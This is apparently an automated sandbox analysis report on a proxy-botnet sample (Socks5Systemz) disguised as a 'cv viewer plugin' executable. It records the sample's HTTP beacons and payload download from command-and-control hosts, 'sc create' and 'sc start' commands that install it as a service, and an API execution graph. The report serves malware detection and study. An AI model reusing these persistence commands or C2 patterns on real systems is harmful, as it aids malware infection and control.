                                                  Aug 31, 2024 22:14:28.038341999 CEST323OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:14:28.734129906 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:14:28 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  68192.168.2.949790185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:14:28.868818045 CEST323OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:14:29.555881977 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:14:29 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  69192.168.2.949791185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:14:29.679579973 CEST323OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:14:30.371910095 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:14:30 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  70192.168.2.94979389.105.201.18320237320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:14:30.452843904 CEST57INGET /rand HTTP/1.1
                                                  Host: 31.214.157.226
                                                  Accept: */*
                                                  Aug 31, 2024 22:14:31.176543951 CEST765OUTHTTP/1.1 200 OK
                                                  Server: nginx/1.27.0
                                                  Date: Sat, 31 Aug 2024 20:14:30 GMT
                                                  Content-Type: application/octet-stream
                                                  Content-Length: 512
                                                  Last-Modified: Fri, 02 Aug 2024 10:35:15 GMT
                                                  Connection: keep-alive
                                                  ETag: "66acb663-200"
                                                  Accept-Ranges: bytes
                                                  Data Raw: f1 d9 4a c0 19 06 38 38 48 c8 13 c0 87 51 f2 f6 75 36 43 c2 e3 fa 93 12 84 52 27 0c 74 f3 3f 7b e6 68 bd 72 0f b9 ba f4 04 75 87 9a 2e 05 41 d3 9c 5b e6 06 f0 00 03 b1 2c 26 44 dc 44 f5 b3 c0 dd 7e d5 70 91 45 b4 d6 f4 b4 71 5a 81 01 c7 f2 0a 08 3c ac 68 a3 22 3d 5d 0c a5 e0 12 93 b0 14 47 cd 04 b4 76 ea e3 95 b5 54 68 dd 23 61 5a 4a 1a 76 2e b2 56 cb f2 36 d1 05 a7 20 b4 f0 3b 4b e0 24 d1 25 17 bd 14 c9 dd 2a 87 bf 43 72 20 1f d3 ce da e1 e1 b2 f8 99 41 20 3f 24 3d 5c fa b4 56 58 ca 18 c4 62 e3 9c 08 42 cc d3 ad f6 8d e1 cb a3 85 0b 7a c6 65 20 20 35 19 3f d2 15 39 19 f8 97 c4 b0 97 85 bd b6 ab c3 e4 1c 42 d5 c9 29 2f 06 c0 02 25 f6 36 47 8e a1 8b 2b ad 23 57 4a 60 ca 77 d1 2d d7 21 77 3f 19 61 8e 6f 9d 25 b8 df 3f 0f b6 fb 20 82 d5 b8 c6 d2 09 7b 71 96 bc 5c 77 99 99 0f 85 fd 3e 87 8e 65 91 93 85 3c 55 36 bb 60 63 68 83 b4 73 2c 24 5e 42 fa 80 67 a0 3d a9 ae de 9d 83 e1 db 0d 30 a4 34 3e 72 0f 57 7c 02 1c 80 19 27 73 20 af c1 56 32 02 11 e6 97 33 12 65 cf 2a e4 58 c4 30 f1 3b 08 fa f5 37 62 1a d0 [TRUNCATED]
                                                  Data Ascii: J88HQu6CR't?{hru.A[,&DD~pEqZ<h"=]GvTh#aZJv.V6 ;K$%*Cr A ?$=\VXbBze 5?9B)/%6G+#WJ`w-!w?ao%? {q\w>e<U6`chs,$^Bg=04>rW|'s V23e*X0;7bRQmDPX=`exE.{u"}Nb@8;;^K"<U %[yrRwwQgPKpD=NDSJR&D9rvJ$zM/v"0mcdzKhu


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  71192.168.2.94979231.214.157.226807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:14:30.452990055 CEST57OUTGET /rand HTTP/1.1
                                                  Host: 31.214.157.226
                                                  Accept: */*
                                                  Aug 31, 2024 22:14:30.625307083 CEST765INHTTP/1.1 200 OK
                                                  Server: nginx/1.27.0
                                                  Date: Sat, 31 Aug 2024 20:14:30 GMT
                                                  Content-Type: application/octet-stream
                                                  Content-Length: 512
                                                  Last-Modified: Fri, 02 Aug 2024 10:35:15 GMT
                                                  Connection: keep-alive
                                                  ETag: "66acb663-200"
                                                  Accept-Ranges: bytes
                                                  Data Raw: f1 d9 4a c0 19 06 38 38 48 c8 13 c0 87 51 f2 f6 75 36 43 c2 e3 fa 93 12 84 52 27 0c 74 f3 3f 7b e6 68 bd 72 0f b9 ba f4 04 75 87 9a 2e 05 41 d3 9c 5b e6 06 f0 00 03 b1 2c 26 44 dc 44 f5 b3 c0 dd 7e d5 70 91 45 b4 d6 f4 b4 71 5a 81 01 c7 f2 0a 08 3c ac 68 a3 22 3d 5d 0c a5 e0 12 93 b0 14 47 cd 04 b4 76 ea e3 95 b5 54 68 dd 23 61 5a 4a 1a 76 2e b2 56 cb f2 36 d1 05 a7 20 b4 f0 3b 4b e0 24 d1 25 17 bd 14 c9 dd 2a 87 bf 43 72 20 1f d3 ce da e1 e1 b2 f8 99 41 20 3f 24 3d 5c fa b4 56 58 ca 18 c4 62 e3 9c 08 42 cc d3 ad f6 8d e1 cb a3 85 0b 7a c6 65 20 20 35 19 3f d2 15 39 19 f8 97 c4 b0 97 85 bd b6 ab c3 e4 1c 42 d5 c9 29 2f 06 c0 02 25 f6 36 47 8e a1 8b 2b ad 23 57 4a 60 ca 77 d1 2d d7 21 77 3f 19 61 8e 6f 9d 25 b8 df 3f 0f b6 fb 20 82 d5 b8 c6 d2 09 7b 71 96 bc 5c 77 99 99 0f 85 fd 3e 87 8e 65 91 93 85 3c 55 36 bb 60 63 68 83 b4 73 2c 24 5e 42 fa 80 67 a0 3d a9 ae de 9d 83 e1 db 0d 30 a4 34 3e 72 0f 57 7c 02 1c 80 19 27 73 20 af c1 56 32 02 11 e6 97 33 12 65 cf 2a e4 58 c4 30 f1 3b 08 fa f5 37 62 1a d0 [TRUNCATED]
                                                  Data Ascii: J88HQu6CR't?{hru.A[,&DD~pEqZ<h"=]GvTh#aZJv.V6 ;K$%*Cr A ?$=\VXbBze 5?9B)/%6G+#WJ`w-!w?ao%? {q\w>e<U6`chs,$^Bg=04>rW|'s V23e*X0;7bRQmDPX=`exE.{u"}Nb@8;;^K"<U %[yrRwwQgPKpD=NDSJR&D9rvJ$zM/v"0mcdzKhu


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  72192.168.2.949794185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:14:30.508012056 CEST323OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:14:31.214618921 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:14:31 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Click to jump to process

                                                  Click to jump to process

                                                  Click to dive into process behavior distribution

                                                  Click to jump to process

                                                  Target ID:0
                                                  Start time:16:12:24
                                                  Start date:31/08/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:cmd /c sc create zuYSo binpath= "C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe" >> C:\servicereg.log 2>&1
                                                  Imagebase:0xc50000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:1
                                                  Start time:16:12:24
                                                  Start date:31/08/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff70f010000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:2
                                                  Start time:16:12:25
                                                  Start date:31/08/2024
                                                  Path:C:\Windows\SysWOW64\sc.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:sc create zuYSo binpath= "C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe"
                                                  Imagebase:0xe30000
                                                  File size:61'440 bytes
                                                  MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:3
                                                  Start time:16:12:26
                                                  Start date:31/08/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:cmd /c sc start zuYSo >> C:\servicestart.log 2>&1
                                                  Imagebase:0xc50000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:4
                                                  Start time:16:12:26
                                                  Start date:31/08/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff70f010000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:6
                                                  Start time:16:12:26
                                                  Start date:31/08/2024
                                                  Path:C:\Windows\SysWOW64\sc.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:sc start zuYSo
                                                  Imagebase:0xe30000
                                                  File size:61'440 bytes
                                                  MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:7
                                                  Start time:16:12:26
                                                  Start date:31/08/2024
                                                  Path:C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe"
                                                  Imagebase:0x400000
                                                  File size:3'665'662 bytes
                                                  MD5 hash:CC497003E60667B5E3A13548EBB571FE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000007.00000002.2645068946.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:false

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:11%
                                                    Dynamic/Decrypted Code Coverage:84.6%
                                                    Signature Coverage:7.5%
                                                    Total number of Nodes:2000
                                                    Total number of Limit Nodes:39
                                                    execution_graph 18575 16de4ee WriteFile 18576 171ba9c 18575->18576 18577 402765 Sleep 18578 40d51a 18577->18578 18578->18578 18579 16a104d 18584 16b33a4 18579->18584 18590 16b32a8 18584->18590 18586 16a1057 18587 16a1aa9 InterlockedIncrement 18586->18587 18588 16a105c 18587->18588 18589 16a1ac5 WSAStartup InterlockedExchange 18587->18589 18589->18588 18591 16b32b4 ___lock_fhandle 18590->18591 18598 16b8593 18591->18598 18597 16b32db ___lock_fhandle 18597->18586 18615 16b88ee 18598->18615 18600 16b32bd 18601 16b32ec RtlDecodePointer RtlDecodePointer 18600->18601 18602 16b32c9 18601->18602 18603 16b3319 18601->18603 18612 16b32e6 18602->18612 18603->18602 18914 16b915d 18603->18914 18605 16b337c RtlEncodePointer RtlEncodePointer 18605->18602 18606 16b332b 18606->18605 18607 16b3350 18606->18607 18921 16b8afc 18606->18921 18607->18602 18609 16b8afc __realloc_crt 62 API calls 18607->18609 18610 16b336a RtlEncodePointer 18607->18610 18611 16b3364 18609->18611 18610->18605 18611->18602 18611->18610 18948 16b859c 18612->18948 18616 16b88ff 18615->18616 18617 16b8912 RtlEnterCriticalSection 18615->18617 18622 16b8976 18616->18622 18617->18600 18619 16b8905 18619->18617 18644 16b8440 18619->18644 18623 16b8982 ___lock_fhandle 18622->18623 18636 16b89a1 18623->18636 18651 16b86d4 18623->18651 18628 16b89c4 ___lock_fhandle 18628->18619 18630 16b8997 18695 16b831d 18630->18695 18631 16b89bf 18703 16b5e5b 18631->18703 18632 16b89ce 18635 16b88ee __lock 59 API calls 18632->18635 18637 16b89d5 18635->18637 18636->18628 18698 16b8ab5 18636->18698 18638 16b89fa 18637->18638 18639 16b89e2 18637->18639 18709 16b2f74 18638->18709 18706 16b920c 18639->18706 18642 16b89ee 18715 16b8a16 18642->18715 18645 16b86d4 __FF_MSGBANNER 59 API calls 18644->18645 18646 16b8448 18645->18646 18647 16b8731 __NMSG_WRITE 59 API calls 18646->18647 18648 16b8450 18647->18648 18884 16b84ef 18648->18884 18718 16c017e 18651->18718 18653 16b86db 18654 16b86e8 18653->18654 18656 16c017e __FF_MSGBANNER 59 API calls 18653->18656 18655 16b8731 __NMSG_WRITE 59 API calls 18654->18655 18658 16b870a 18654->18658 18657 16b8700 18655->18657 18656->18654 18659 16b8731 __NMSG_WRITE 59 API calls 18657->18659 18660 16b8731 18658->18660 18659->18658 18661 16b874f __NMSG_WRITE 18660->18661 18662 16b8876 18661->18662 18664 16c017e __FF_MSGBANNER 55 API calls 18661->18664 18792 16b454b 18662->18792 18666 16b8762 18664->18666 18665 16b88df 18665->18630 18667 16b887b GetStdHandle 18666->18667 18668 16c017e __FF_MSGBANNER 55 API calls 18666->18668 18667->18662 18671 16b8889 _strlen 18667->18671 18669 16b8773 18668->18669 18669->18667 18670 16b8785 18669->18670 18670->18662 18740 16bf53d 18670->18740 18671->18662 18674 16b88c2 WriteFile 18671->18674 18674->18662 18675 16b88e3 18678 16b4f05 __invoke_watson 8 API calls 18675->18678 18676 16b87b2 GetModuleFileNameW 18677 16b87d2 18676->18677 18682 16b87e2 __NMSG_WRITE 18676->18682 18679 16bf53d __NMSG_WRITE 55 API calls 18677->18679 18680 16b88ed 18678->18680 18679->18682 18681 16b8912 RtlEnterCriticalSection 18680->18681 18684 16b8976 __mtinitlocknum 55 API calls 18680->18684 18681->18630 18682->18675 18683 16b8828 18682->18683 18749 16bf5b2 18682->18749 18683->18675 18758 16bf4d1 18683->18758 18686 16b8905 18684->18686 18686->18681 18690 16b8440 __amsg_exit 55 API calls 18686->18690 18689 16bf4d1 __NMSG_WRITE 55 API calls 18691 16b885f 18689->18691 18692 16b8911 18690->18692 18691->18675 18693 16b8866 18691->18693 18692->18681 18767 16c01be RtlEncodePointer 18693->18767 18807 16b82e9 GetModuleHandleExW 18695->18807 18702 16b8ac3 18698->18702 18700 16b89b8 18700->18631 18700->18632 18702->18700 18810 16b2fac 18702->18810 18827 16b9505 Sleep 18702->18827 18830 16b5c72 GetLastError 18703->18830 18705 16b5e60 18705->18628 18707 16b9229 InitializeCriticalSectionAndSpinCount 18706->18707 18708 16b921c 18706->18708 18707->18642 18708->18642 18710 16b2fa6 _free 18709->18710 18711 16b2f7d HeapFree 18709->18711 18710->18642 18711->18710 18712 16b2f92 18711->18712 18713 16b5e5b __setmbcp 57 API calls 18712->18713 18714 16b2f98 GetLastError 18713->18714 18714->18710 18883 16b8a58 RtlLeaveCriticalSection 18715->18883 18717 16b8a1d 18717->18628 18719 16c0188 18718->18719 18720 16b5e5b __setmbcp 59 API calls 18719->18720 18721 16c0192 18719->18721 18722 16c01ae 18720->18722 18721->18653 18725 16b4ef5 18722->18725 18728 16b4eca RtlDecodePointer 18725->18728 18729 16b4edd 18728->18729 18734 16b4f05 IsProcessorFeaturePresent 18729->18734 18732 16b4eca __gmtime64_s 8 API calls 18733 16b4f01 18732->18733 18733->18653 18735 16b4f10 18734->18735 18736 16b4d98 __call_reportfault 7 API calls 18735->18736 18737 16b4f25 18736->18737 18738 16b9513 ___raise_securityfailure GetCurrentProcess TerminateProcess 18737->18738 18739 16b4ef4 18738->18739 18739->18732 18741 16bf556 18740->18741 18742 16bf548 18740->18742 18743 16b5e5b __setmbcp 59 API calls 18741->18743 18742->18741 18747 16bf56f 18742->18747 18744 16bf560 18743->18744 18745 16b4ef5 __gmtime64_s 9 API calls 18744->18745 18746 16b87a5 18745->18746 18746->18675 18746->18676 18747->18746 18748 16b5e5b __setmbcp 59 API calls 18747->18748 18748->18744 18753 16bf5c0 18749->18753 18750 16bf5c4 18751 16b5e5b __setmbcp 59 API calls 18750->18751 18752 16bf5c9 18750->18752 18754 16bf5f4 18751->18754 18752->18683 18753->18750 18753->18752 18756 16bf603 18753->18756 18755 16b4ef5 __gmtime64_s 9 API calls 18754->18755 18755->18752 18756->18752 18757 16b5e5b __setmbcp 59 API calls 18756->18757 18757->18754 18759 16bf4eb 18758->18759 18762 16bf4dd 18758->18762 18760 16b5e5b __setmbcp 59 API calls 18759->18760 18761 16bf4f5 18760->18761 18763 16b4ef5 __gmtime64_s 9 API calls 18761->18763 18762->18759 18765 16bf517 18762->18765 18764 16b8848 18763->18764 18764->18675 18764->18689 18765->18764 18766 16b5e5b __setmbcp 59 API calls 18765->18766 18766->18761 18768 16c01f2 ___crtIsPackagedApp 18767->18768 18769 16c02b1 IsDebuggerPresent 18768->18769 18770 16c0201 LoadLibraryExW 18768->18770 18773 16c02bb 18769->18773 18774 16c02d6 18769->18774 18771 16c023e GetProcAddress 18770->18771 18772 16c0218 GetLastError 18770->18772 18777 16c0252 7 API calls 18771->18777 18780 16c02ce 18771->18780 18776 16c0227 LoadLibraryExW 18772->18776 18772->18780 18778 16c02c9 18773->18778 18779 16c02c2 OutputDebugStringW 18773->18779 18775 16c02db RtlDecodePointer 18774->18775 18774->18778 18775->18780 18776->18771 18776->18780 18781 16c02ae 18777->18781 18782 16c029a GetProcAddress RtlEncodePointer 18777->18782 18778->18780 18786 16c0302 RtlDecodePointer RtlDecodePointer 18778->18786 18790 16c031a 18778->18790 18779->18778 18783 16b454b __output_l 6 API calls 18780->18783 18781->18769 18782->18781 18787 16c03a0 18783->18787 18784 16c033e RtlDecodePointer 18784->18780 18785 16c0352 RtlDecodePointer 18785->18784 18788 16c0359 18785->18788 18786->18790 18787->18662 18788->18784 18791 16c036a RtlDecodePointer 18788->18791 18790->18784 18790->18785 18791->18784 18793 16b4553 18792->18793 18794 16b4555 IsProcessorFeaturePresent 18792->18794 18793->18665 18796 16b958f 18794->18796 18799 16b953e IsDebuggerPresent 18796->18799 18800 16b9553 __call_reportfault 18799->18800 18805 16b9528 SetUnhandledExceptionFilter UnhandledExceptionFilter 18800->18805 18802 16b955b __call_reportfault 18806 16b9513 GetCurrentProcess TerminateProcess 18802->18806 18804 16b9578 18804->18665 18805->18802 18806->18804 18808 16b8314 ExitProcess 18807->18808 18809 16b8302 GetProcAddress 18807->18809 18809->18808 18811 16b3027 18810->18811 18818 16b2fb8 18810->18818 18812 16b8204 __calloc_impl RtlDecodePointer 18811->18812 18813 16b302d 18812->18813 18815 16b5e5b __setmbcp 58 API calls 18813->18815 18814 16b86d4 __FF_MSGBANNER 58 API calls 18820 16b2fc3 18814->18820 18826 16b301f 18815->18826 18816 16b2feb RtlAllocateHeap 18816->18818 18816->18826 18817 16b8731 __NMSG_WRITE 58 API calls 18817->18820 18818->18816 18819 16b3013 18818->18819 18818->18820 18824 16b3011 18818->18824 18828 16b8204 RtlDecodePointer 18818->18828 18822 16b5e5b __setmbcp 58 API calls 18819->18822 18820->18814 18820->18817 18820->18818 18823 16b831d _doexit 3 API calls 18820->18823 18822->18824 18823->18820 18825 16b5e5b __setmbcp 58 API calls 18824->18825 18825->18826 18826->18702 18827->18702 18829 16b8217 18828->18829 18829->18818 18844 16b91cb 18830->18844 18832 16b5c87 18833 16b5cd5 SetLastError 18832->18833 18847 16b8a6d 18832->18847 18833->18705 18837 16b5cae 18838 16b5ccc 18837->18838 18839 16b5cb4 18837->18839 18841 16b2f74 _free 56 API calls 18838->18841 18856 16b5ce1 18839->18856 18843 16b5cd2 18841->18843 18842 16b5cbc GetCurrentThreadId 18842->18833 18843->18833 18845 16b91de 18844->18845 18846 16b91e2 TlsGetValue 18844->18846 18845->18832 18846->18832 18848 16b8a74 18847->18848 18850 16b5c9a 18848->18850 18852 16b8a92 18848->18852 18866 16c04b8 18848->18866 18850->18833 18853 16b91ea 18850->18853 18852->18848 18852->18850 18874 16b9505 Sleep 18852->18874 18854 16b9200 18853->18854 18855 16b9204 TlsSetValue 18853->18855 18854->18837 18855->18837 18857 16b5ced ___lock_fhandle 18856->18857 18858 16b88ee __lock 59 API calls 18857->18858 18859 16b5d2a 18858->18859 18875 16b5d82 18859->18875 18862 16b88ee __lock 59 API calls 18863 16b5d4b ___addlocaleref 18862->18863 18878 16b5d8b 18863->18878 18865 16b5d76 ___lock_fhandle 18865->18842 18867 16c04c3 18866->18867 18873 16c04de 18866->18873 18868 16c04cf 18867->18868 18867->18873 18869 16b5e5b __setmbcp 58 API calls 18868->18869 18871 16c04d4 18869->18871 18870 16c04ee RtlAllocateHeap 18870->18871 18870->18873 18871->18848 18872 16b8204 __calloc_impl RtlDecodePointer 18872->18873 18873->18870 18873->18871 18873->18872 18874->18852 18881 16b8a58 RtlLeaveCriticalSection 18875->18881 18877 16b5d44 18877->18862 18882 16b8a58 RtlLeaveCriticalSection 18878->18882 18880 16b5d92 18880->18865 18881->18877 18882->18880 18883->18717 18887 16b85a5 18884->18887 18886 16b845b 18888 16b85b1 ___lock_fhandle 18887->18888 18889 16b88ee __lock 52 API calls 18888->18889 18890 16b85b8 18889->18890 18891 16b8671 _doexit 18890->18891 18893 16b85e6 RtlDecodePointer 18890->18893 18907 16b86bf 18891->18907 18893->18891 18894 16b85fd RtlDecodePointer 18893->18894 18900 16b860d 18894->18900 18896 16b86ce ___lock_fhandle 18896->18886 18898 16b861a RtlEncodePointer 18898->18900 18899 16b86b6 18901 16b831d _doexit 3 API calls 18899->18901 18900->18891 18900->18898 18902 16b862a RtlDecodePointer RtlEncodePointer 18900->18902 18903 16b86bf 18901->18903 18905 16b863c RtlDecodePointer RtlDecodePointer 18902->18905 18904 16b86cc 18903->18904 18912 16b8a58 RtlLeaveCriticalSection 18903->18912 18904->18886 18905->18900 18908 16b869f 18907->18908 18909 16b86c5 18907->18909 18908->18896 18911 16b8a58 RtlLeaveCriticalSection 18908->18911 18913 16b8a58 RtlLeaveCriticalSection 18909->18913 18911->18899 18912->18904 18913->18908 18915 16b917b RtlSizeHeap 18914->18915 18916 16b9166 18914->18916 18915->18606 18917 16b5e5b __setmbcp 59 API calls 18916->18917 18918 16b916b 18917->18918 18919 16b4ef5 __gmtime64_s 9 API calls 18918->18919 18920 16b9176 18919->18920 18920->18606 18924 16b8b03 18921->18924 18923 16b8b40 18923->18607 18924->18923 18926 16c03a4 18924->18926 18947 16b9505 Sleep 18924->18947 18927 16c03ad 18926->18927 18928 16c03b8 18926->18928 18930 16b2fac _malloc 59 API calls 18927->18930 18929 16c03c0 18928->18929 18934 16c03cd 18928->18934 18931 16b2f74 _free 59 API calls 18929->18931 18932 16c03b5 18930->18932 18946 16c03c8 _free 18931->18946 18932->18924 18933 16c0405 18936 16b8204 __calloc_impl RtlDecodePointer 18933->18936 18934->18933 18935 16c03d5 RtlReAllocateHeap 18934->18935 18938 16c0435 18934->18938 18940 16b8204 __calloc_impl RtlDecodePointer 18934->18940 18943 16c041d 18934->18943 18935->18934 18935->18946 18937 16c040b 18936->18937 18939 16b5e5b __setmbcp 59 API calls 18937->18939 18941 16b5e5b __setmbcp 59 API calls 18938->18941 18939->18946 18940->18934 18942 16c043a GetLastError 18941->18942 18942->18946 18944 16b5e5b __setmbcp 59 API calls 18943->18944 18945 16c0422 GetLastError 18944->18945 18945->18946 18946->18924 18947->18924 18951 16b8a58 RtlLeaveCriticalSection 18948->18951 18950 16b32eb 18950->18597 18951->18950 18952 17094d7 18953 1709f2c 18952->18953 18956 16af8a3 CreateFileA 18953->18956 18957 16af99f 18956->18957 18962 16af8d4 18956->18962 18958 16af8ec DeviceIoControl 18958->18962 18959 16af995 FindCloseChangeNotification 18959->18957 18960 16af961 GetLastError 18960->18959 18960->18962 18962->18958 18962->18959 18962->18960 18963 16b3b4c 18962->18963 18966 16b3b54 18963->18966 18964 16b2fac _malloc 59 API calls 18964->18966 18965 16b3b6e 18965->18962 18966->18964 18966->18965 18967 16b8204 __calloc_impl RtlDecodePointer 18966->18967 18968 16b3b72 std::exception::exception 18966->18968 18967->18966 18971 16b455a 18968->18971 18970 16b3b9c 18973 16b4579 RaiseException 18971->18973 18973->18970 18974 4022ab 18978 16b3d0f 18974->18978 18976 40d020 18979 16b3d18 18978->18979 18980 16b3d1d 18978->18980 18992 16bb8e1 18979->18992 18984 16b3d32 18980->18984 18983 4022b1 Sleep 18983->18976 18985 16b3d3e ___lock_fhandle 18984->18985 18989 16b3d8c ___DllMainCRTStartup 18985->18989 18991 16b3de9 ___lock_fhandle 18985->18991 18996 16b3b9d 18985->18996 18987 16b3dc6 18988 16b3b9d __CRT_INIT@12 138 API calls 18987->18988 18987->18991 18988->18991 18989->18987 18990 16b3b9d __CRT_INIT@12 138 API calls 18989->18990 18989->18991 18990->18987 18991->18983 18993 16bb911 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 18992->18993 18994 16bb904 18992->18994 18995 16bb908 18993->18995 18994->18993 18994->18995 18995->18980 18997 16b3ba9 ___lock_fhandle 18996->18997 18998 16b3c2b 18997->18998 18999 16b3bb1 18997->18999 19001 16b3c2f 18998->19001 19002 16b3c94 18998->19002 19044 16b81e7 GetProcessHeap 18999->19044 19006 16b3c50 19001->19006 19037 16b3bba ___lock_fhandle __CRT_INIT@12 19001->19037 19145 16b845c 19001->19145 19004 16b3c99 19002->19004 